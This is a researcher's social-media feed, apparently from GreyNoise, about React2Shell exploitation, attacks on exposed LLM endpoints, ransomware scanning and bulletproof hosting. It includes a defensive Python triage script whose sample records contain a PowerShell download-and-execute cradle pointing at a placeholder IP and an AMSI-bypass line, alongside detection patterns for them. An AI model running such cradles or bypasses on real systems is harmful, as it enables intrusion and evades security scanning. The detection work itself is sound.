
Posts by hrbrmstr 🇺🇦 🇬🇱 🇨🇦 🏳️‍🌈

(saw this in RSS) I've had various Ollama models write CLAUDE[.]md and skills, and also had minimax m2.1 (which is just amaze) do it and they're all pretty good at it.

1 month ago 2 0 1 0

The infrastructure ties back to established CVE exploitation operations.

h/t to Defused for their report as well: xcancel.com/DefusedC...

www.greynoise.io/blo...
2/2

2 months ago 1 0 0 0
Threat Actors Actively Targeting LLMs Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments.

New research: Threat actors are actively mapping LLM infrastructure.

Our Ollama honeypots captured 91K+ attack sessions. One campaign systematically probed 73+ model endpoints—GPT-4o, Claude, Llama, Gemini, and more—across 80K sessions in 11 days.

www.greynoise.io/blo...
1/2

2 months ago 3 0 1 0

If your systems were hit during this window, the vulnerability data may already be for sale.

Links to IoCs are in the post.
4/4

2 months ago 0 0 0 0

* The IAB Model: This wasn't a direct hit; it was a "restocking" of the Initial Access Broker market.
* Infrastructure: The activity originated from a suspicious hosting provider (CTG Server Limited) with a history of phishing and abuse.
3/4

2 months ago 0 0 1 0

A single operator systematically scanned the internet, testing 240+ different exploits to build a fresh inventory for 2026 ransomware attacks.

Key Takeaways:

* Timing is everything: Attackers used the holiday skeleton crew window to scan unimpeded for 4 days.
2/4

2 months ago 0 0 1 0
The Ransomware Ground Game: How A Christmas Scanning Campaign Will Fuel 2026 Attacks Over four days in December, one operator scanned the internet with 240+ exploits, logging confirmed vulnerabilities that could power targeted intrusions in 2026.

That which was originally a private customer threat intel share in our weekly At The Edge reports is now a public blog post!

www.greynoise.io/blo...

This is a deep dive into a massive reconnaissance campaign that unfolded between December 25–28.
1/4

2 months ago 1 0 1 0

#macOS folks!!

Today is a *great* day to:

```bash
brew update && brew upgrade && brew cleanup && brew doctor
```

then:

```bash
brew bundle dump --file=~/Brewfile --describe --force
```

to create a `Brewfile` you can use to "quickly" restore the Homebrew bits that you rely on.

3 months ago 11 0 0 0

archive.ph/cPlPK

3 months ago 4 0 1 0

I ran it when I got to #2.1/#2.2's house and hopefully the networks you visit will be equally as clean.

Lifehacker does a bang-up job explaining it, too.

NPR has some more background on this new type of consumer exposure, too.

www.npr.org/2025/11/...
2/2

3 months ago 1 0 0 0
GreyNoise Check all green!

🙏🏽 Lifehacker for introducing GreyNoise Check to a broader population!

👉 lifehacker.com/tech/...

If you haven't used GreyNoise Check — check.labs.greynoise.io — this is the perfect time to do so, especially if you're visiting friends/fam over the holidays.
1/2

3 months ago 1 0 1 0
React2Shell Payload Analysis: A Look at Selected Opportunistic and Possibly AI-"Enhanced" Probes and Attacks Over the past ~1.5 weeks, the React2Shell campaign has unleashed a flood of exploitation attempts targeting vulnerable React Server Components. Analyzing the payload size distribution across these attacks reveals a clear fingerprint of modern cybercrime, and a landscape dominated by automated scanners with a handful of sophisticated outliers.

I also took the opportunity to make fun of some very incompetent attackers.

Hey, if they can attack, so can I!

www.greynoise.io/blo...
3/3

3 months ago 1 0 0 0

We've captured over 50K (some, barely) "unique" #React2Shell payloads, and a few caught our eye as potentially being some of the more nascent "AI"-created or enhanced ones.

We took the opportunity to dig into five of them and see what makes them tick.

2/3

3 months ago 3 0 1 0
React2Shell Payload Analysis: A Look at Selected Opportunistic and Possibly AI-"Enhanced" Probes and Attacks Over the past ~1.5 weeks, the React2Shell campaign has unleashed a flood of exploitation attempts targeting vulnerable React Server Components. Analyzing the payload size distribution across these attacks reveals a clear fingerprint of modern cybercrime, and a landscape dominated by automated scanners with a handful of sophisticated outliers.

"There's Payloads, And Then There's pAIloads: A Look At Selected Opportunistic (And Possibly AI-"Enhanced") React2Shell Probes and Attacks"

www.greynoise.io/blo...
1/3

3 months ago 4 1 1 0
Video

Just in: Watch #React2Shell exploitation unfold over time in the map below (geo of source IPs attempting to exploit CVE-2025-55182).

#GreyNoise #ThreatIntel #CVE202555182 #Nextjs #Cybersecurity

3 months ago 8 4 0 1
React2Shell Side Quest: Tracking Down Malicious MeshCentral Nodes – GreyNoise Labs While spelunking through React2Shell initial access payloads, MeshCentral entered the building, so we decided to see just how Mesh-y GreyNoise Data Is

Whilst spelunking through React2Shell traffic and associated initial access payloads, I came across a late-to-the party attacker attempting to deploy a MeshCentral agent for C2. Thanks to Censys, we poked a bit harder, and boy howdy are we on the precipice of a real mes[hs].

3 months ago 3 0 0 0

This is textbook opportunistic exploitation—not novel, but serious. These campaigns lead to credential theft, cryptomining, ransomware staging, & access brokering.

Patch if you haven't. DO NOT RELY ON WAFs ALONE.

Block IPs using GN feeds & monitor for IoCs in the post.
3/3

3 months ago 1 0 0 0

What we're seeing:

Automation-heavy traffic (Go clients, scanner UAs)

PoE validation via PowerShell math commands

Encoded stagers downloading secondary payloads

AMSI bypass attempts via reflection

~50% of IPs first seen in December 2025

Early migration into Mirai botnets
2/3

3 months ago 1 0 1 0
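The indicator list in the post above (automation user agents, PowerShell arithmetic used as a did-my-RCE-fire check, encoded stagers that pull a second stage, AMSI tampering via reflection) translates fairly directly into triage logic. The block below is an added example written for this page, not GreyNoise code and not derived from the actual React2Shell payloads; the request records it classifies are constructed samples, and the `Attempt` shape and tag names are my own choices. It decodes `-EncodedCommand` payloads (base64 of UTF-16LE) so that the download-cradle and AMSI checks run against the plaintext script rather than the encoded blob.

```python
"""Heuristic triage of web-exploit attempt records for the indicator classes
named in the post. Added example for this page; not GreyNoise code.
All sample records below are constructed, not real captures."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Client strings typical of mass scanners and exploit frameworks.
AUTOMATION_UA = re.compile(
    r"Go-http-client|python-requests|curl/|zgrab|masscan|nuclei", re.I)
# "powershell -c 7*7"-style probes: a bare arithmetic expression whose result
# in the response confirms code execution without dropping anything on disk.
PS_MATH = re.compile(
    r"powershell(?:\.exe)?\s+(?:-\w+\s+)*-?c(?:ommand)?\s+[\"']?\s*\d+\s*[\+\-\*/]\s*\d+",
    re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_PS = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Download cradles that fetch a second-stage payload.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|iwr\b|curl\b|wget\b|certutil", re.I)
# Reflection-based AMSI tampering touches these internal names.
AMSI_REFLECTION = re.compile(
    r"AmsiUtils|amsiInitFailed|amsiContext|AmsiScanBuffer", re.I)


@dataclass
class Attempt:
    """One exploit attempt as a sensor might log it (hypothetical shape)."""
    src_ip: str
    user_agent: str
    body: str


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it
    (UTF-16LE, then base64). Used here only to construct sample records."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(command: str) -> str:
    """Return the plaintext of an -EncodedCommand payload, or '' if absent/invalid."""
    m = ENCODED_PS.search(command)
    if not m:
        return ""
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(attempt: Attempt) -> Set[str]:
    """Tag an attempt with every indicator class it exhibits."""
    tags: Set[str] = set()
    if AUTOMATION_UA.search(attempt.user_agent):
        tags.add("automation-ua")
    if PS_MATH.search(attempt.body):
        tags.add("ps-math-validation")
    decoded = decode_encoded_powershell(attempt.body)
    if decoded:
        tags.add("encoded-powershell")
        if DOWNLOAD_CRADLE.search(decoded):
            tags.add("stager-download")
    # AMSI checks run over both the raw body and the decoded script.
    if AMSI_REFLECTION.search(attempt.body + "\n" + decoded):
        tags.add("amsi-bypass")
    return tags


def triage(attempts: List[Attempt]) -> Dict[str, Set[str]]:
    """Map each source IP to the union of tags seen from it."""
    by_ip: Dict[str, Set[str]] = {}
    for a in attempts:
        by_ip.setdefault(a.src_ip, set()).update(classify(a))
    return by_ip


# Constructed samples (RFC 5737 documentation addresses, invented payloads).
SAMPLES = [
    Attempt("203.0.113.10", "Go-http-client/1.1", "powershell -c 7*7"),
    Attempt("203.0.113.11", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            "powershell -nop -w hidden -enc " + encode_ps(
                "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')")),
    Attempt("203.0.113.12", "python-requests/2.31.0",
            "powershell -nop -enc " + encode_ps(
                "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)")),
    Attempt("198.51.100.20", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",
            '{"query":"hello"}'),
]

if __name__ == "__main__":
    for ip, tags in triage(SAMPLES).items():
        print(ip, sorted(tags) or "(no indicators)")
```

The regexes are deliberately loose; on real traffic you would want to pair them with the payload-size and first-seen-date signals the thread mentions, and treat "ps-math-validation" hits as the cheapest place to pivot, since a source that confirms execution once tends to come back with a stager.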
CVE-2025-55182 (React2Shell) Opportunistic Exploitation In The Wild: What The GreyNoise Observation Grid Is Seeing So Far GreyNoise is already seeing opportunistic, largely automated exploitation attempts consistent with the newly disclosed React Server Components (RSC) “Flight” protocol RCE—often referred to publicly as “React2Shell” and tracked as CVE-2025-55182.

I had the [mis?]fortune of being awake just as attackers decided to slam the public internet with React2Shell exploits. GreyNoise had a tag up for it yesterday afternoon.

Full write-up of the initial spate of attacks:
www.greynoise.io/blo...
1/3

3 months ago 4 0 1 0
Holiday cyber scams are getting more inventive Hackers are hoping to take advantage of the holiday season, and they're not just stealing money or data.

Got 30s of public media "fame" on NPR yesterday www.npr.org/2025/11/28/n...

4 months ago 8 1 1 0
GreyNoise IP Check Check if your IP address has been observed by GreyNoise sensors. Instantly detect malicious activity, compromised devices, and security threats affecting your network.

Perfect for holiday tech support season—check your relatives' networks in 30 seconds instead of doing the awkward "let me look at your computer" thing.

For devs: `curl -s check.labs.greynoise...` returns JSON. No auth, no limits.

Full story: www.greynoise.io/blo...
3/3

4 months ago 3 0 0 0
GreyNoise IP Check Check if your IP address has been observed by GreyNoise sensors. Instantly detect malicious activity, compromised devices, and security threats affecting your network.

Our Labs team built a free tool to check: visit check.labs.greynoise.io and see instantly if your IP has been caught scanning the internet.

No signup. No email harvesting. Just answers from our global sensor network that sees billions of IPs.
2/3

4 months ago 3 1 1 0

🔍 New tool alert: GreyNoise IP Check

Your home network might be compromised and you'd never know. Residential proxies, IoT botnets, and router malware are everywhere—turning regular internet connections into attack infrastructure.
1/3

4 months ago 10 3 1 0

¹ I apologize for anyone who ended up with tea on their keyboards after reading that word when associated with the EU.
5/5

4 months ago 4 0 0 0
The Stark Industries Shell Game - When Bulletproof Hosting Proves Bulletproof EU sanctions hit Stark Industries in May 2025. GreyNoise data shows how the group quietly rebranded to THE.Hosting and kept its malicious infrastructure running.

While others look through "legal documents" we got receipts right from the network packets. You can read the whole thing @ "When Bulletproof Hosting Proves Bulletproof: The Stark Industries Shell Game"

👉 www.greynoise.io/blo...
4/5

4 months ago 3 0 1 0

As a result, Stark did a series of stunningly adroit "business", organizational, & network infrastructure moves that not only let them completely avoid punishment, but also come back even stronger and more dangerous than they were before.
3/5

4 months ago 0 0 1 0

Back in May, the EU decided to wield its mighty¹ fist & drop some sanctions on Stark. Except…they (the EU) suck @ OPSEC & the impending sanctions leaked.
2/5

4 months ago 2 0 1 0
Line graph showing IP activity from two bulletproof hosting providers from July to November. Orange line represents PQ Hosting (AS44477) peaking at 1,600 IPs in early September before declining to near zero by November. Blue line shows THE.Hosting/WorkTitans (AS209847) remaining low until late September, then spiking to over 1,000 IPs in November as PQ Hosting activity ceased, illustrating the migration of malicious operations between hosting providers.

There once was an organization called Stark Industries (no, not *that* one! this one is real!).

They emerged around the time Russia decided to invade Ukraine. Oddly enough, their ASN real estate was the source of scads of Russian state-sponsored cyber ops.
1/5

4 months ago 3 0 1 0

Good morning.

This is your reminder to get to the gym so that you can beat up racists if you have to.

4 months ago 1505 234 60 56

The protocol is cool.

Relying on Bluesky for storage, authentication, etc. is stupid.

Really, really, really, really stupid.

5 months ago 2 0 0 0